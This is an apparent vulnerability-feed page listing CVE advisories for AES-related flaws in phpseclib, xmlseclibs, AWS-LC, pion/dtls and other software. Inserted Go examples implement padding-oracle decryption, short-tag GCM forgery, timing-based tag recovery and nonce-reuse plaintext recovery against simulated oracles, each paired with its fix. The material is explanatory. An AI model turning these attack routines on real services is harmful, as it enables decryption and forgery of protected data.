210 matches found

Debian CVE (added 2026/03/20 2:48 a.m.)

CVE-2026-32935

phpseclib is a PHP secure communications library. Projects using versions 0.1.1 through 1.0.26, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a padding oracle timing attack when using AES in CBC mode. This issue has been fixed in versions 1.0.27, 2.0.52 and 3.0.50...

CVSS 8.2 | AI score 5.7 | EPSS 0.00374 | Exploits 0
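Added example, not phpseclib's code: a Go (standard-library crypto/cipher) simulation of the padding oracle attack the advisory refers to. The oracle here returns the padding verdict directly instead of leaking it through decryption timing; that is the only difference from the timing variant, and it is enough for the attacker to recover CBC plaintext byte by byte without the key. The key, IV and message are constructed inside the block.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
)

// pkcs7Unpad strips PKCS#7 padding, failing on any malformed trailer.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("bad length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// Oracle is a constructed stand-in for the vulnerable decryptor: it holds the
// key and answers one question per query, "was the padding valid?". In the
// phpseclib case that bit leaked through timing; here it is returned directly.
type Oracle struct{ block cipher.Block }

func (o Oracle) PaddingValid(iv, ct []byte) bool {
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(o.block, iv).CryptBlocks(pt, ct)
	_, err := pkcs7Unpad(pt)
	return err == nil
}

// RecoverBlock recovers the plaintext of one ciphertext block from the block
// that precedes it (the IV for the first block), right to left, with at most
// 256 oracle queries per byte.
func RecoverBlock(o Oracle, prev, target []byte) []byte {
	bs := aes.BlockSize
	inter := make([]byte, bs)  // D_K(target): plaintext before XOR with prev
	forged := make([]byte, bs) // attacker-chosen replacement for prev
	for i := bs - 1; i >= 0; i-- {
		pad := byte(bs - i)
		for j := i + 1; j < bs; j++ {
			forged[j] = inter[j] ^ pad // known bytes are made to decrypt to pad
		}
		for g := 0; g < 256; g++ {
			forged[i] = byte(g)
			if !o.PaddingValid(forged, target) {
				continue
			}
			if i == bs-1 { // exclude a chance "02 02" ending: a real 01 pad
				forged[i-1] ^= 0xff // survives a change in the byte to its left
				ok := o.PaddingValid(forged, target)
				forged[i-1] ^= 0xff
				if !ok {
					continue
				}
			}
			inter[i] = byte(g) ^ pad
			break
		}
	}
	pt := make([]byte, bs)
	for i := range pt {
		pt[i] = inter[i] ^ prev[i]
	}
	return pt
}

// Demo CBC-encrypts a constructed 31-byte message (two blocks once padded)
// under a random key and recovers it using nothing but the oracle.
func Demo() (string, error) {
	key, iv := make([]byte, 16), make([]byte, aes.BlockSize)
	rand.Read(key)
	rand.Read(iv)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	msg := []byte("attack at dawn, burn everything") // constructed sample
	n := aes.BlockSize - len(msg)%aes.BlockSize
	padded := append(msg, bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)

	o, prev := Oracle{block}, iv
	var recovered []byte
	for off := 0; off < len(ct); off += aes.BlockSize {
		cur := ct[off : off+aes.BlockSize]
		recovered = append(recovered, RecoverBlock(o, prev, cur)...)
		prev = cur
	}
	pt, err := pkcs7Unpad(recovered)
	return string(pt), err
}
```

The fix is not a faster padding check but removing the oracle altogether: authenticate the ciphertext (AES-GCM, or encrypt-then-MAC with a constant-time tag comparison) before any padding is inspected, so a tampered message is rejected identically whatever its padding decrypts to.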
Cvelist (added 2026/03/19 12:00 a.m.)

CVE-2025-67112

Use of a hard-coded AES-256-CBC key in the configuration backup/restore implementation of Small Cell Sercomm SCE4255W FreedomFi Englewood firmware before DG3934v3@2308041842 allows remote authenticated users to decrypt, modify, and re-encrypt device configurations, enabling credential manipulatio...

EPSS 0.00401 | Exploits 0 | References 3
NVD (added 2026/03/16 2:19 p.m.)

CVE-2026-32600

xml-security is a library that implements XML signatures and encryption. Prior to versions 2.3.1 and 1.13.9, XML nodes encrypted with either aes-128-gcm, aes-192-gcm, or aes-256-gcm lack validation of the authentication tag length. An attacker can use this to brute-force an authentication tag,...

CVSS 8.2 | EPSS 0.00148 | Exploits 1 | References 3
Packet Storm News (added 2026/03/16 12:00 a.m.)

Botan C++ Crypto Algorithms Library 3.11.0

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS 10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to...

AI score 5.8 | Exploits 0
CNNVD (added 2026/03/16 12:00 a.m.)

Xmlseclibs security vulnerability

Xmlseclibs is a library developed by robrichards, written in PHP, for handling XML encryption and signing. Versions of Xmlseclibs prior to 3.1.5 contained security vulnerabilities. These vulnerabilities stemmed from the lack of authentication tag length validation for XML nodes encrypted using...

CVSS 8.2 | AI score 5.9 | EPSS 0.00152 | Exploits 1 | References 3
Snyk (added 2026/03/13 10:41 p.m.)

Improper Validation of Integrity Check Value

Overview robrichards/xmlseclibs is a PHP library for XML Security. Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value in the decryptSymmetric function, when checking tag length for the aes-128-gcm, aes-192-gcm, and aes-256-gcm encryption algorithms. A...

CVSS 8.2 | AI score 5.9 | EPSS 0.00152 | Exploits 1 | References 2
CVE (added 2026/03/13 7:58 p.m.)

CVE-2026-32600

XML-Security library (xml-security) is affected in versions prior to 2.3.1 and 1.13.9 where AES-GCM encrypted XML nodes do not validate the authentication tag length. This can allow an attacker to brute-force the authentication tag, recover the GHASH key, decrypt encrypted nodes, and forge cipher...

CVSS 8.2 | AI score 5.9 | EPSS 0.00148 | Exploits 1 | References 3 | Affected software 1
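Added example serving the xml-security / xmlseclibs entries above (NVD, CNNVD, Snyk and CVE items for CVE-2026-32600); it is not code from either library. The Go block recomputes the AES-GCM tag from the ciphertext alone with a small GHASH implementation (checked against crypto/cipher at run time), then contrasts a verifier that honours a message-supplied tag length with one that insists on 128 bits: against the lax verifier a tampered node is accepted after at most 256 guesses of a 1-byte tag. Key, nonce, AAD and plaintext are constructed values. Each accepted forgery also gives the attacker a linear relation in H = E_K(0), which is how the GHASH key recovery mentioned in the advisory proceeds; that algebra is not shown here.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/subtle"
	"encoding/binary"
)

func xor16(a *[16]byte, b [16]byte) {
	for k := range a {
		a[k] ^= b[k]
	}
}

// gfMul multiplies two GF(2^128) elements in GCM bit order (SP 800-38D, Alg. 1).
func gfMul(x, y [16]byte) [16]byte {
	var z [16]byte
	v := y
	for i := 0; i < 128; i++ {
		if x[i/8]&(0x80>>uint(i%8)) != 0 {
			xor16(&z, v)
		}
		lsb := v[15] & 1
		for k := 15; k > 0; k-- {
			v[k] = v[k]>>1 | v[k-1]<<7
		}
		v[0] >>= 1
		if lsb == 1 {
			v[0] ^= 0xe1 // reduce modulo x^128 + x^7 + x^2 + x + 1
		}
	}
	return z
}

// ghash returns GHASH_H(A, C): AAD and ciphertext zero-padded to 16-byte
// blocks, then a block holding the bit lengths of each.
func ghash(h [16]byte, aad, ct []byte) [16]byte {
	var y, lens [16]byte
	for _, data := range [][]byte{aad, ct} {
		for len(data) > 0 {
			var blk [16]byte
			data = data[copy(blk[:], data):]
			xor16(&y, blk)
			y = gfMul(y, h)
		}
	}
	binary.BigEndian.PutUint64(lens[:8], uint64(len(aad))*8)
	binary.BigEndian.PutUint64(lens[8:], uint64(len(ct))*8)
	xor16(&y, lens)
	return gfMul(y, h)
}

// gcmTag recomputes the full 128-bit tag for a 96-bit nonce:
// T = GHASH_H(A, C) xor E_K(nonce || 0^31 || 1), with H = E_K(0^128).
// It needs only the ciphertext, never the plaintext.
func gcmTag(block cipher.Block, nonce, aad, ct []byte) [16]byte {
	var h, j0, ekj0 [16]byte
	block.Encrypt(h[:], h[:])
	copy(j0[:], nonce)
	j0[15] = 1
	block.Encrypt(ekj0[:], j0[:])
	t := ghash(h, aad, ct)
	xor16(&t, ekj0)
	return t
}

// verify checks a tag. With strict=false it models the flawed decryptor: the
// tag length comes from the message and only that many bytes are compared.
// With strict=true (the fix) anything but a full 16-byte tag is refused.
func verify(block cipher.Block, nonce, aad, ct, tag []byte, strict bool) bool {
	if len(tag) == 0 || len(tag) > 16 || (strict && len(tag) != 16) {
		return false
	}
	want := gcmTag(block, nonce, aad, ct)
	return subtle.ConstantTimeCompare(want[:len(tag)], tag) == 1
}

// Demo seals a constructed message with crypto/cipher, checks that gcmTag
// agrees with the library, then tampers with the ciphertext and brute-forces a
// 1-byte tag against the lax verifier. It reports whether the forgery was
// accepted, how many guesses that took, and whether strict mode rejects it.
func Demo() (forged bool, guesses int, strictRejects bool) {
	key, nonce := []byte("0123456789abcdef"), []byte("unique-nonce") // constructed
	aad, pt := []byte("xenc:EncryptedData"), []byte("<card>4111 1111 1111 1111</card>")
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	sealed := gcm.Seal(nil, nonce, pt, aad)
	ct, tag := sealed[:len(pt)], sealed[len(pt):]
	if want := gcmTag(block, nonce, aad, ct); subtle.ConstantTimeCompare(want[:], tag) != 1 {
		panic("gcmTag disagrees with crypto/cipher")
	}
	bad := append([]byte(nil), ct...)
	bad[0] ^= 0x01 // modify the encrypted node
	for g := 0; g < 256; g++ {
		guesses++
		short := []byte{byte(g)}
		if verify(block, nonce, aad, bad, short, false) {
			return true, guesses, !verify(block, nonce, aad, bad, short, true)
		}
	}
	return false, guesses, true
}
```

The point to take from the block: the tag length is a security parameter of the receiver, not of the message. A decryptor that reads it from the XML (or from any attacker-controlled header) turns a 2^128 forgery problem into a 2^(8·t) one for the t the attacker picks.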
Tenable Nessus (added 2026/03/05 12:00 a.m.)

Linux Distros Unpatched Vulnerability : CVE-2026-3337

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing...

CVSS 8.2 | AI score 6 | EPSS 0.01079 | Exploits 0 | References 2
OSV (added 2026/03/03 8:09 p.m.)

GHSA-65P9-R9H6-22VJ AWS-LC has Timing Side-Channel in AES-CCM Tag Verification

Summary AWS-LC is an open-source, general-purpose cryptographic library. Impact Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing analysis. The impacted implementations are through the EVP...

CVSS 8.2 | AI score 6 | EPSS 0.01079 | Exploits 0 | References 7
Cvelist (added 2026/03/02 9:20 p.m.)

CVE-2026-3337 Timing Side-Channel in AES-CCM Tag Verification in AWS-LC

Observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing analysis. The impacted implementations are through the EVP CIPHER API: EVP_aes_128_ccm, EVP_aes_192_ccm, and EVP_aes_256_ccm. Customers of AWS servic...

CVSS 8.2 | EPSS 0.01079 | Exploits 0 | References 3
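Added illustration for the three AWS-LC entries above (Tenable, OSV and Cvelist items for CVE-2026-3337); it is not AWS-LC code and makes no claim about where AWS-LC's discrepancy sits, since the page only says that tag validity was observable through timing. The Go block uses an early-exit byte comparison, the textbook source of such a leak, and counts comparison steps instead of measuring wall-clock time; with that signal the attacker recovers a 16-byte tag in at most 16 × 256 queries instead of 2^128. The constant-time comparison is the fix. The secret tag is drawn at random inside the block.

```go
package main

import (
	"crypto/rand"
	"crypto/subtle"
)

// Verifier holds the tag the decryptor computed for a message; an attacker
// submitting forgeries gets one verdict per attempt. The steps counter stands
// in for the wall-clock time a real attacker would have to measure.
type Verifier struct{ secret []byte }

// leakyCompare mirrors a non-constant-time check: it stops at the first
// mismatch, so the work done grows with the length of the matching prefix.
func (v Verifier) leakyCompare(guess []byte) (ok bool, steps int) {
	if len(guess) != len(v.secret) {
		return false, 0
	}
	for i := range guess {
		steps++
		if guess[i] != v.secret[i] {
			return false, steps
		}
	}
	return true, steps
}

// constantTimeCompare is the fix: the work does not depend on where the first
// mismatch sits, so timing carries no information about the secret.
func (v Verifier) constantTimeCompare(guess []byte) bool {
	return subtle.ConstantTimeCompare(guess, v.secret) == 1
}

// RecoverTag rebuilds the tag one byte at a time using only the step count:
// at position i, the guess that gets compared one byte further is correct.
func RecoverTag(v Verifier, n int) (tag []byte, queries int) {
	tag = make([]byte, n)
	for i := 0; i < n; i++ {
		best, bestSteps := byte(0), -1
		for g := 0; g < 256; g++ {
			tag[i] = byte(g)
			ok, steps := v.leakyCompare(tag)
			queries++
			if ok {
				return tag, queries
			}
			if steps > bestSteps {
				best, bestSteps = byte(g), steps
			}
		}
		tag[i] = best
	}
	return tag, queries
}

// Demo draws a random 16-byte tag and reports whether the attacker recovered
// it (checked with the constant-time comparison) and how many queries it took.
func Demo() (recovered bool, queries int) {
	secret := make([]byte, 16)
	if _, err := rand.Read(secret); err != nil {
		panic(err)
	}
	v := Verifier{secret}
	tag, q := RecoverTag(v, 16)
	return v.constantTimeCompare(tag), q
}
```

In practice the signal is buried in noise and each position needs many repeated measurements, which is why advisories of this kind say "potentially" and why network distance matters; it does not change the conclusion that any comparison whose duration depends on the secret has to go.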
Packet Storm News (added 2026/02/26 12:00 a.m.)

A High-Throughput AES-GCM Implementation on GPUs for Secure, Policy-Based Access to Massive Astronomical Catalogs

The era of large astronomical surveys generates massive image catalogs requiring efficient and secure access, particularly during pre-publication periods where data confidentiality and integrity are paramount. While Findable, Accessible, Interoperable, and Reusable FAIR principles guide the...

AI score 6.1 | Exploits 0
OSV (added 2026/02/19 5:28 p.m.)

GO-2026-4479 Usage of random nonce generation with AES GCM ciphers risks leaking the authentication key in github.com/pion/dtls

Usage of random nonce generation with AES GCM ciphers risks leaking the authentication key in github.com/pion/dtls...

CVSS 5.9 | AI score 5.5 | EPSS 0.00619 | Exploits 0 | References 4
Github Security Blog (added 2026/02/18 10:33 p.m.)

uTLS has a fingerprint vulnerability from GREASE ECH mismatch for Chrome parrots

There is a fingerprint mismatch with Chrome when using GREASE ECH, having to do with ciphersuite selection. When Chrome selects the preferred ciphersuite in the outer ClientHello and the ciphersuite for ECH, it does so consistently based on hardware support. That means, for example, if it prefers...

CVSS 5.3 | AI score 5.5 | EPSS 0.00154 | Exploits 0 | References 6 | Affected software 1
IBM Security Bulletins (added 2026/02/18 10:05 p.m.)

Security Bulletin: IBM WebSphere Application Server, which is bundled with IBM WebSphere Hybrid Edition, is affected by a vulnerability that could provide weaker than expected security (CVE-2025-13333)

Summary IBM WebSphere Application Server, which is bundled with IBM WebSphere Hybrid Edition, is affected by a vulnerability that could provide weaker than expected security when enabling AES-256 password encryption. Vulnerability Details Refer to the security bulletins listed in the...

CVSS 4.9 | AI score 5.5 | EPSS 0.0031 | Exploits 0 | Affected software 1
RedhatCVE (added 2026/02/15 1:19 a.m.)

CVE-2026-26334

Calero VeraSMART versions prior to 2026 R1 contain hardcoded static AES encryption keys within Veramark.Framework.dll Veramark.Core.Config class. These keys are used to encrypt the password of the service account stored in C:\VeraSMART Data\app.settings. An attacker with local access to the...

CVSS 8.5 | AI score 5.6 | EPSS 0.00087 | Exploits 0 | References 1
Cvelist (added 2026/02/13 8:53 p.m.)

CVE-2026-26334 Calero VeraSMART < 2026 R1 Hardcoded Static AES Keys Allow Decryption of Service Credentials

Calero VeraSMART versions prior to 2026 R1 contain hardcoded static AES encryption keys within Veramark.Framework.dll Veramark.Core.Config class. These keys are used to encrypt the password of the service account stored in C:\VeraSMART Data\app.settings. An attacker with local access to the...

CVSS 8.5 | EPSS 0.00087 | Exploits 0 | References 2
Vulnrichment (added 2026/02/13 8:53 p.m.)

CVE-2026-26334 Calero VeraSMART < 2026 R1 Hardcoded Static AES Keys Allow Decryption of Service Credentials

Calero VeraSMART versions prior to 2026 R1 contain hardcoded static AES encryption keys within Veramark.Framework.dll Veramark.Core.Config class. These keys are used to encrypt the password of the service account stored in C:\VeraSMART Data\app.settings. An attacker with local access to the...

CVSS 8.5 | AI score 5.6 | EPSS 0.00087 | Exploits 0 | References 2
CVE (added 2026/02/11 9:07 p.m.)

CVE-2026-26014

Pion DTLS (Go) vulnerability CVE-2026-26014 affects versions v1.0.0 through v3.1.0 due to improper nonce generation with AES-GCM ciphers, enabling nonce reuse within a session. This can let remote attackers obtain the authentication key and spoof data. Remedy: upgrade to a release later than v3.1.0. The provided documen...

CVSS 5.9 | AI score 5.6 | EPSS 0.00619 | Exploits 0 | References 6 | Affected software 1
Vulnrichment (added 2026/02/11 9:07 p.m.)

CVE-2026-26014 Pion DTLS uses random nonce generation with AES GCM ciphers risks leaking the authentication key

Pion DTLS is a Go implementation of Datagram Transport Layer Security. Pion DTLS versions v1.0.0 through v3.1.0 use random nonce generation with AES GCM ciphers, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging the reuse of a nonce in a...

CVSS 5.9 | AI score 5.6 | EPSS 0.00619 | Exploits 0 | References 4
Snyk (added 2026/02/11 3:13 p.m.)

Inadequate Encryption Strength

Overview Affected versions of this package are vulnerable to Inadequate Encryption Strength due to the use of the random nonce generation with AES GCM ciphers. An attacker can obtain the authentication key and spoof data by exploiting nonce reuse within a session. Remediation Upgrade...

CVSS 8.2 | AI score 5.7 | EPSS 0.00619 | Exploits 0 | References 2
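Added example for the pion/dtls entries above (the OSV GO-2026-4479 item and the CVE, Vulnrichment and Snyk items for CVE-2026-26014); it is not pion code and assumes nothing about how pion drew its nonces beyond the advisories' "random nonce generation". The Go block first shows the immediate damage of one repeated (key, nonce) pair under AES-GCM: keystream reuse exposes a second record given a guessable first one. It then builds the nonce the way RFC 5288 (TLS) and RFC 6347 (DTLS) prescribe for AES-GCM, from an implicit salt and the record sequence number, which cannot repeat within an epoch. The sample records and salt are constructed. Recovering the GHASH key from two tags under one nonce, which is the "authentication key" the advisories mention, is a further step not shown here.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"errors"
)

// RecoverWithReusedNonce encrypts two records under the same key and nonce.
// GCM is CTR mode underneath, so c1 XOR c2 = p1 XOR p2 and a known p1
// reveals p2 outright. Returns the recovered text and whether it matches p2.
func RecoverWithReusedNonce() (string, bool) {
	key, nonce := make([]byte, 16), make([]byte, 12)
	rand.Read(key)
	rand.Read(nonce) // drawn at random, then reused for the second record
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	gcm, _ := cipher.NewGCM(block)
	p1 := []byte("GET /status HTTP/1.0") // constructed: a guessable record
	p2 := []byte("Cookie: session=abcd") // constructed: the secret record
	c1 := gcm.Seal(nil, nonce, p1, nil)
	c2 := gcm.Seal(nil, nonce, p2, nil)
	out := make([]byte, len(p2))
	for i := range out {
		out[i] = c1[i] ^ c2[i] ^ p1[i]
	}
	return string(out), string(out) == string(p2)
}

// DTLSNonce builds the 12-byte AES-GCM nonce as a 4-byte implicit salt from
// the key block followed by the 8-byte explicit record sequence number
// (16-bit epoch || 48-bit sequence). A counter cannot repeat inside an epoch,
// so neither can the nonce; a random 64-bit explicit part would be expected
// to collide after roughly 2^32 records.
func DTLSNonce(salt [4]byte, epoch uint16, seq uint64) ([12]byte, error) {
	var n [12]byte
	if seq >= 1<<48 {
		return n, errors.New("sequence number exhausted: rekey before sending")
	}
	copy(n[:4], salt[:])
	binary.BigEndian.PutUint64(n[4:], seq) // top 16 bits are zero (seq < 2^48)
	binary.BigEndian.PutUint16(n[4:6], epoch)
	return n, nil
}
```

The sequence number is already on the wire in the DTLS record header, so the explicit nonce part costs nothing to send and nothing to keep secret; what it must be is unique per key, which a counter guarantees and a random draw only makes probable.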